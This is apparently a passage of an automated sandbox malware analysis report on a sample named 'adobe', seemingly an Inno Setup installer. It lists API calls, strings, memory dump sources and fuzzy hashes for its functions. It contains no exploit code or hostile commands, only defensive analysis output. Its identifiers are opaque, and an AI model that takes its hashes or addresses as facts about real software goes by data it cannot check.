                                                                                                                                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2280970139-0
                                                                                                                                                          • Opcode ID: 82c5499aa3392c3e403b9f4de3da674b7760f040ec75a9184635b640fb16ef5d
                                                                                                                                                          • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                                                                                          • Opcode Fuzzy Hash: 82c5499aa3392c3e403b9f4de3da674b7760f040ec75a9184635b640fb16ef5d
                                                                                                                                                          • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GlobalHandle.KERNEL32 ref: 00406287
                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                                                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Global$AllocHandleWire
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2210401237-0
                                                                                                                                                          • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                                                                          • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                                                                                          • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                                                                          • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A32D
                                                                                                                                                          • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A333
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$EnableItemSystem
                                                                                                                                                          • String ID: CurPageChanged
                                                                                                                                                          • API String ID: 3692539535-2490978513
                                                                                                                                                          • Opcode ID: 9433ae3e8c0d8cef7e1db9c76da1d64c1d3fe783aa42d9efde8d789ed8796f27
                                                                                                                                                          • Instruction ID: 09a3f119f95f3e8b80b2758de21f208edffb37633c658fb2599a7cba3a6cac5e
                                                                                                                                                          • Opcode Fuzzy Hash: 9433ae3e8c0d8cef7e1db9c76da1d64c1d3fe783aa42d9efde8d789ed8796f27
                                                                                                                                                          • Instruction Fuzzy Hash: FBB13734644504DFC711DB99CA89AA973F5EF49304F2540F6F808AB322DB39AE51DF4A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A869,?,00000000,00000000,00000001,00000000,00479295,?,00000000), ref: 00479259
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to parse "reg" constant, xrefs: 00479260
                                                                                                                                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 004790CD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                                                          • API String ID: 3535843008-1938159461
                                                                                                                                                          • Opcode ID: 5287f0b1ae5120a3cff67f0f9c2f0b6d3246ff0ddf6e1fab1b6f496d44585299
                                                                                                                                                          • Instruction ID: 835d74a0d62e725ebcdd17b5ae281fba2600a31c0460f99f6913a21494258781
                                                                                                                                                          • Opcode Fuzzy Hash: 5287f0b1ae5120a3cff67f0f9c2f0b6d3246ff0ddf6e1fab1b6f496d44585299
                                                                                                                                                          • Instruction Fuzzy Hash: 54814374E04148AFCB10EF95D481ADEBBF9AF49314F50C1AAE814B7392D7389E05CB99
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32(00000000,00481CA6,?,00000000,00481CE7,?,?,00000001,?,00000000,00000000,00000000,?,0046B0C9), ref: 00481B55
                                                                                                                                                          • SetActiveWindow.USER32(?,00000000,00481CA6,?,00000000,00481CE7,?,?,00000001,?,00000000,00000000,00000000,?,0046B0C9), ref: 00481B67
                                                                                                                                                          Strings
                                                                                                                                                          • Will not restart Windows automatically., xrefs: 00481C86
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ActiveForeground
                                                                                                                                                          • String ID: Will not restart Windows automatically.
                                                                                                                                                          • API String ID: 307657957-4169339592
                                                                                                                                                          • Opcode ID: 340b31c50f7ea1cca09d8bb089bde520bea5fae951facb36814384a506b2de65
                                                                                                                                                          • Instruction ID: 3c2f546218ed638d6c0bffff214a58deef3f88b70f64df96d283108febfe91f1
                                                                                                                                                          • Opcode Fuzzy Hash: 340b31c50f7ea1cca09d8bb089bde520bea5fae951facb36814384a506b2de65
                                                                                                                                                          • Instruction Fuzzy Hash: AC410430244240AED721FB65ED05B6E7BACE716744F144C77E880573B2E77C6806AB5E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32(?), ref: 00424975
• WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CursorMessageWait
• String ID: /sI
• API String ID: 4021538199-3342994382
• Opcode ID: 905af7f5c58c9462d5240183e36bf06d70efece05efe40a48100f8035784c986
• Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
• Opcode Fuzzy Hash: 905af7f5c58c9462d5240183e36bf06d70efece05efe40a48100f8035784c986
• Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,00477B9A,?,?,00000001,00000000,00000000,00477BB5), ref: 00477B83
Strings
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00477B0E
• %s\%s_is1, xrefs: 00477B2C
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1598650737
• Opcode ID: f07031d9b840cf403d64a87c8ed23e227c3039c30c54fd167b70acffae6f136e
• Instruction ID: 45934157c02c0c496e244a65e612b419ef8ac41f5fcdc24e779c94ba4387b6af
• Opcode Fuzzy Hash: f07031d9b840cf403d64a87c8ed23e227c3039c30c54fd167b70acffae6f136e
• Instruction Fuzzy Hash: 83215574B04604AFDB01DFA9CC51ADEBBE8EB49704F90847AE804E7391D7786E01CB69
Uniqueness
Uniqueness Score: -1.00%

Strings
• Failed to proceed to next wizard page; aborting., xrefs: 0046BE9C
• Failed to proceed to next wizard page; showing wizard., xrefs: 0046BEB0
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID:
• String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
• API String ID: 0-1974262853
• Opcode ID: 5dc44d02648091a3d8a5c75f99e041105ecf733eeb8d95a73b78758489fad9c1
• Instruction ID: 49aa560ffa09cfd52454d09d180e6a2672ed2ce8b76d71ce0c2e5ac3cdd5c4fd
• Opcode Fuzzy Hash: 5dc44d02648091a3d8a5c75f99e041105ecf733eeb8d95a73b78758489fad9c1
• Instruction Fuzzy Hash: 963192306082049FD711DB69D985BD977F5EB05314F5900BBF504DB3A2D7796E80CB89
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA2D
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA5E
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ExecuteMessageSendShell
• String ID: open
• API String ID: 812272486-2758837156
• Opcode ID: 19d38553df1093e21c3c422bb3cdf04df903a53ff10fe20460ad4336edb0aeee
• Instruction ID: 6bca1b6fab24ab3242c773a662d76c02cb62ab3d7fac9f31e1195573cc844b5d
• Opcode Fuzzy Hash: 19d38553df1093e21c3c422bb3cdf04df903a53ff10fe20460ad4336edb0aeee
• Instruction Fuzzy Hash: FB212E71E00204AFEB00DF69C881A9EB7F8EB44704F60857AB405F7391D6789A468B58
Uniqueness
Uniqueness Score: -1.00%

APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 00454858
• GetLastError.KERNEL32(0000003C,00000000,004548A1,?,?,00000001,00000001), ref: 00454869
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: DirectoryErrorExecuteLastShellSystem
• String ID: <
• API String ID: 893404051-4251816714
• Opcode ID: 6b19e8113a50972803015087762972cb6966f8d2ae8e68ed7e70ad69a14f5c8b
• Instruction ID: 9c2ad5da6bcfda7e7c126e73bbb5a2ea45b70f831c3532c714208d446c35f548
• Opcode Fuzzy Hash: 6b19e8113a50972803015087762972cb6966f8d2ae8e68ed7e70ad69a14f5c8b
• Instruction Fuzzy Hash: FF21A574A002499FDB00EF65C88269E7BECEF44359F50003AF844E7381D7789D49CB98
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
• RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AllocInitializeLocal
• String ID: )
• API String ID: 2227675388-1084416617
• Opcode ID: 3f1f852e20762185401cba0ba12560d65db98eef0cfc92f8ffba015679676d3b
• Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
• Opcode Fuzzy Hash: 3f1f852e20762185401cba0ba12560d65db98eef0cfc92f8ffba015679676d3b
                                                                                                                                                          • Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004951C9
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Window
• String ID: /INITPROCWND=$%x $@
• API String ID: 2353593579-4169826103
• Opcode ID: d1053a672179ff3583de3c7baa2822a5df7e43495b3a7d26068aec598c4a0bc3
• Instruction ID: 9aa7367fdd5c7212477ef5f2c1fb1af8b7d2e13723dbac355fa9f8943d192997
• Opcode Fuzzy Hash: d1053a672179ff3583de3c7baa2822a5df7e43495b3a7d26068aec598c4a0bc3
• Instruction Fuzzy Hash: 2F11B731A086088FDB02DBA4EC52BAEBFE8EB49314F60447BE504E7291D77C99058B58
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• SysFreeString.OLEAUT32(?), ref: 00446D1A
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: String$AllocByteCharFreeMultiWide
• String ID: NIL Interface Exception$Unknown Method
• API String ID: 3952431833-1023667238
• Opcode ID: c57f3d86235feb565d953f7b33e9ce0aeb0c4074c408860b6886a41cd5ab8bd7
• Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
• Opcode Fuzzy Hash: c57f3d86235feb565d953f7b33e9ce0aeb0c4074c408860b6886a41cd5ab8bd7
• Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00494AC8,?,00494ABC,00000000,00494AA3), ref: 00494A6E
• CloseHandle.KERNEL32(00494B08,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00494AC8,?,00494ABC,00000000), ref: 00494A85
  • Part of subcall function 00494958: GetLastError.KERNEL32(00000000,004949F0,?,?,?,?), ref: 0049497C
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseCreateErrorHandleLastProcess
• String ID: D
• API String ID: 3798668922-2746444292
• Opcode ID: 1da2f313038589c7262435e0a7452cd7b059717ed73d4c479575660809c3100c
• Instruction ID: 80fb1cf359d0b2f5838fc37b3898d8fc4d4ed0433fb5d18bfd797e21ae142335
• Opcode Fuzzy Hash: 1da2f313038589c7262435e0a7452cd7b059717ed73d4c479575660809c3100c
• Instruction Fuzzy Hash: 9A015EB1644248AFDB00DBA1CC52E9FBBACEF88715F51003AB904E72D1D6785E05866C
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
• RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Value$EnumQuery
• String ID: Inno Setup: No Icons
• API String ID: 1576479698-2016326496
• Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
• Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
• Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
• Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00454B10: GetCurrentProcess.KERNEL32(00000028), ref: 00454B1F
  • Part of subcall function 00454B10: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B25
• SetForegroundWindow.USER32(?), ref: 00495F04
Strings
• Restarting Windows., xrefs: 00495EE1
• Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00495F2F
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Process$CurrentForegroundOpenTokenWindow
• String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
• API String ID: 3179053593-4147564754
• Opcode ID: 99583e24e2e9f0d058b79390f435a056594d33341ba4437182f0d97c2d65ddcd
• Instruction ID: 2fddce828c46425de23b35f9f90fc861464a2ee23dcfefb5497e4e6653f4e5f3
• Opcode Fuzzy Hash: 99583e24e2e9f0d058b79390f435a056594d33341ba4437182f0d97c2d65ddcd
• Instruction Fuzzy Hash: 6D01D470614240ABEB12EBA5E902B5C7FE89B4431DF90407BF800AB6D3CA3C9949871D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0047BD14: FreeLibrary.KERNEL32(6FBB0000,004801C6), ref: 0047BD2A
                                                                                                                                                            • Part of subcall function 0047B9E8: GetTickCount.KERNEL32 ref: 0047BA30
                                                                                                                                                            • Part of subcall function 0045658C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004565AB
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497023), ref: 00496721
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497023), ref: 00496727
                                                                                                                                                          Strings
                                                                                                                                                          • Detected restart. Removing temporary directory., xrefs: 004966DB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                                                                          • String ID: Detected restart. Removing temporary directory.
                                                                                                                                                          • API String ID: 1717587489-3199836293
                                                                                                                                                          • Opcode ID: 3a3b7b64b696b0b5eb4b2fbd0c96e19912eeadef8c9504a627da7b4bf6410b86
                                                                                                                                                          • Instruction ID: e7033022c8af971c365411b5d921d6e3ccf45ff122b41cddea678748c3bdb50c
                                                                                                                                                          • Opcode Fuzzy Hash: 3a3b7b64b696b0b5eb4b2fbd0c96e19912eeadef8c9504a627da7b4bf6410b86
                                                                                                                                                          • Instruction Fuzzy Hash: 51E02B722086442EDA0273F6BC5696B7F4CD74576CB6344BBF90882542D92D4804C97C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
